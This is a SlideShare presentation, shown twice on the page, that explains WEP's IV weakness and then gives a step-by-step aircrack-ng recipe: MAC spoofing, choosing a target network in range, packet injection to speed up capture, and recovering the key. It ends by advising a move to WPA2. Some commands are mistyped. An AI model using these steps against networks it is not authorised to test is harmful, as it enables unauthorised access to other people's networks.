SlideShare uma empresa Scribd logo
1 de 13
Cracking WEP Secured
  Wireless Networks



               Hammam Samara
What is WEP

 Stands for Wired Equivalent Privacy.
 13 years old protocol. (even older than Google!).
 Several serious weaknesses in this protocol have been
 identified since the early starts.
     Can be cracked with readily available software within
     minutes!
     I never believed until try it my self! - so this session.

 Despite that, WEP is still widely in use! and often the first
 security choice presented to user by router config. tools.
WEP Authentication

 Two methods of authentication can be used with WEP:
   Open System authentication
      After the authentication and association, the client
      needs to have the right keys.
   Shared Key authentication.
      Four-way challenge-response handshake is used.
 Which way is Stronger ?
How is works

Basic WEP encryption: RC4 keystream XORed with plain-text.
So, Where is the weakness?

In the IV's it selves!
    a 24-bit IV is not long enough to ensure this on a busy
    network.
        There is a 50% probability the same IV will repeat after
       5000 packets.
    Network not busy ?
       We could make it so! ;-)
       There are ways for an attacker to send packets on the
       network and thereby stimulate reply packets which can
       then be inspected to find the key.
    Now freely available software such as aircrack-ng can
    crack any WEP key in minutes.
Still Not believe it ?

      I used to too.
Lets Try it

Requirements:
  BackTrack 3 on CD or USB.
  Computer with compatible 802.11 wireless card.
  Wireless Access point or WIFI router using WEP
  encryption.
Enabling Monitor Mode.

Procedure:

  Boot From Backtrack3 Live CD and open kernal window.
  First is enabling "Monitor mode" for your wifi card.
     For Intel PROWireless3945ABG
          modprobe -r iwl3945
          modprobe ipwraw
     Now Stop the wifi card.
          iwconfig
          airmon-ng stop [device]
          airmon-ng [device] down
     Change the mac address to a fake one:
          macchanger --mac 00:11:22:33:44:55 [device]
          airmong-ng start [device]
Attacking The target.

Procedure:
  Discover all wireless network in range.
     We will using AiroDump for this purpose.
        airodump-ng [device]
     Now Choose a target.
        airodump-ng -c [channel] -w [filename] --bssid
        [bssied] [device]
     Now to speed up the data output:(open another consol)
        aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e
        [essid] [devcie]
         aireply-ng -3 -b [bssid] -h 00:11:22:33:44:
        55 [device]
Attacking The target.

Procedure:
  Now if you have enough packets, you can begin the crack.
     But if not ? use the following command
        aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b
        [bssid] -h 00:11:22:33:44:55 [device]
        This will force the AP to generate more and more
        packets.
     Wait after you get > 20,000 packets and start new consol
     window.
        aircrack-ng -n 128 -b [bssid] [filename]-01.cap
         you may also try -n to be 64 bit if cracking fails.
     Once the Aircrack is done, you will be left with the key!
Now What you could do about it ?

 Nothing!
 Just Move to WPA (Wi-Fi Protected Access) wireless
 security.
    But while you there switching your security protocols,
    what about choosing WPA2.
    For you it is just an option, but actually you are making a
    big difference for your network crackers.
Thank you For Lestining.

 And Do not forget to secure your
            wireless
Materials

 BackTrack3 ISO File:
     FTP: http://www.filewatcher.com/m/bt3-final.iso.728705024.0.0.html
     Torrent: http://thepiratebay.org/torrent/4250350/Backtrack_3_Final_-_ISO
 Step by Step tutorial: http://goo.gl/1Yq2
 Video tutorial: http://www.youtube.com/watch?v=kDD9PjiQ2_U
 Cracking WEP on Windows: http://tazforum.thetazzone.com/viewtopic.php?t=2069.

Mais conteúdo relacionado

Mais procurados

Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Fábio Afonso
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityAyoma Wijethunga
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 
Wireless security837
Wireless security837Wireless security837
Wireless security837mark scott
 
WEP/WPA attacks
WEP/WPA attacksWEP/WPA attacks
WEP/WPA attacksHuda Seyam
 
Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networksSahil Rai
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level securityChetan Kumar S
 
Super Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
Super Barcode Training Camp - Motorola AirDefense Wireless Security PresentationSuper Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
Super Barcode Training Camp - Motorola AirDefense Wireless Security PresentationSystem ID Warehouse
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?Tom Isaacson
 

Mais procurados (20)

Iuwne10 S04 L05
Iuwne10 S04 L05Iuwne10 S04 L05
Iuwne10 S04 L05
 
802.11i
802.11i802.11i
802.11i
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
 
Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
 
Wireless Cracking using Kali
Wireless Cracking using KaliWireless Cracking using Kali
Wireless Cracking using Kali
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network Security
 
Wireless Attacks
Wireless AttacksWireless Attacks
Wireless Attacks
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
 
WPA2
WPA2WPA2
WPA2
 
WPA 3
WPA 3WPA 3
WPA 3
 
Wireless security837
Wireless security837Wireless security837
Wireless security837
 
Wpa3
Wpa3Wpa3
Wpa3
 
WEP/WPA attacks
WEP/WPA attacksWEP/WPA attacks
WEP/WPA attacks
 
Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networks
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level security
 
Super Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
Super Barcode Training Camp - Motorola AirDefense Wireless Security PresentationSuper Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
Super Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
 
Wi fi security
Wi fi securityWi fi security
Wi fi security
 
WPA-3: SEA and Dragonfly
WPA-3: SEA and DragonflyWPA-3: SEA and Dragonfly
WPA-3: SEA and Dragonfly
 
WPA3 - What is it good for?
WPA3 - What is it good for?WPA3 - What is it good for?
WPA3 - What is it good for?
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
 

Semelhante a Cracking WEP Secured Wireless Networks

Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networksguestf2e41
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!edwardo
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hackingPranshu Pareek
 
How to Hack WiFi on Windows
How to Hack WiFi  on Windows How to Hack WiFi  on Windows
How to Hack WiFi on Windows Vrushank Narola
 
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu ExploitationAhmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu Exploitationbarcamp.my
 
Hack wifi password using kali linux
Hack wifi password using kali linuxHack wifi password using kali linux
Hack wifi password using kali linuxHelder Oliveira
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security Hariraj Rathod
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hackingMihir Shah
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"DefCamp
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminarNilesh Sapariya
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's  more than cracking WEPWireless Pentesting: It's  more than cracking WEP
Wireless Pentesting: It's more than cracking WEPJoe McCray
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones HijackingPriyanka Aash
 

Semelhante a Cracking WEP Secured Wireless Networks (20)

Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networks
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hacking
 
How to Hack WiFi on Windows
How to Hack WiFi  on Windows How to Hack WiFi  on Windows
How to Hack WiFi on Windows
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
Aircrack
AircrackAircrack
Aircrack
 
Wi-FI Hacking
Wi-FI Hacking Wi-FI Hacking
Wi-FI Hacking
 
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu ExploitationAhmad Siddiq Wi-Fi Ninjutsu Exploitation
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
 
Backtrack Manual Part10
Backtrack Manual Part10Backtrack Manual Part10
Backtrack Manual Part10
 
Hack wifi password using kali linux
Hack wifi password using kali linuxHack wifi password using kali linux
Hack wifi password using kali linux
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Wifi cracking
Wifi crackingWifi cracking
Wifi cracking
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's  more than cracking WEPWireless Pentesting: It's  more than cracking WEP
Wireless Pentesting: It's more than cracking WEP
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
Wi fi hacking
Wi fi hackingWi fi hacking
Wi fi hacking
 
Parrot Drones Hijacking
Parrot Drones HijackingParrot Drones Hijacking
Parrot Drones Hijacking
 

Cracking WEP Secured Wireless Networks

  • 1. Cracking WEP Secured Wireless Networks Hammam Samara
  • 2. What is WEP Stands for Wired Equivalent Privacy. 13 years old protocol. (even older than Google!). Several serious weaknesses in this protocol have been identified since the early starts. Can be cracked with readily available software within minutes! I never believed until try it my self! - so this session. Despite that, WEP is still widely in use! and often the first security choice presented to user by router config. tools.
  • 3. WEP Authentication Two methods of authentication can be used with WEP: Open System authentication After the authentication and association, the client needs to have the right keys. Shared Key authentication. Four-way challenge-response handshake is used. Which way is Stronger ?
  • 4. How is works Basic WEP encryption: RC4 keystream XORed with plain-text.
  • 5. So, Where is the weakness? In the IV's it selves! a 24-bit IV is not long enough to ensure this on a busy network. There is a 50% probability the same IV will repeat after 5000 packets. Network not busy ? We could make it so! ;-) There are ways for an attacker to send packets on the network and thereby stimulate reply packets which can then be inspected to find the key. Now freely available software such as aircrack-ng can crack any WEP key in minutes.
  • 6. Still Not believe it ? I used to too.
  • 7. Lets Try it Requirements: BackTrack 3 on CD or USB. Computer with compatible 802.11 wireless card. Wireless Access point or WIFI router using WEP encryption.
  • 8. Enabling Monitor Mode. Procedure: Boot From Backtrack3 Live CD and open kernal window. First is enabling "Monitor mode" for your wifi card. For Intel PROWireless3945ABG modprobe -r iwl3945 modprobe ipwraw Now Stop the wifi card. iwconfig airmon-ng stop [device] airmon-ng [device] down Change the mac address to a fake one: macchanger --mac 00:11:22:33:44:55 [device] airmong-ng start [device]
  • 9. Attacking The target. Procedure: Discover all wireless network in range. We will using AiroDump for this purpose. airodump-ng [device] Now Choose a target. airodump-ng -c [channel] -w [filename] --bssid [bssied] [device] Now to speed up the data output:(open another consol) aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] [devcie] aireply-ng -3 -b [bssid] -h 00:11:22:33:44: 55 [device]
  • 10. Attacking The target. Procedure: Now if you have enough packets, you can begin the crack. But if not ? use the following command aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:55 [device] This will force the AP to generate more and more packets. Wait after you get > 20,000 packets and start new consol window. aircrack-ng -n 128 -b [bssid] [filename]-01.cap you may also try -n to be 64 bit if cracking fails. Once the Aircrack is done, you will be left with the key!
  • 11. Now What you could do about it ? Nothing! Just Move to WPA (Wi-Fi Protected Access) wireless security. But while you there switching your security protocols, what about choosing WPA2. For you it is just an option, but actually you are making a big difference for your network crackers.
  • 12. Thank you For Lestining. And Do not forget to secure your wireless
  • 13. Materials BackTrack3 ISO File: FTP: http://www.filewatcher.com/m/bt3-final.iso.728705024.0.0.html Torrent: http://thepiratebay.org/torrent/4250350/Backtrack_3_Final_-_ISO Step by Step tutorial: http://goo.gl/1Yq2 Video tutorial: http://www.youtube.com/watch?v=kDD9PjiQ2_U Cracking WEP on Windows: http://tazforum.thetazzone.com/viewtopic.php?t=2069.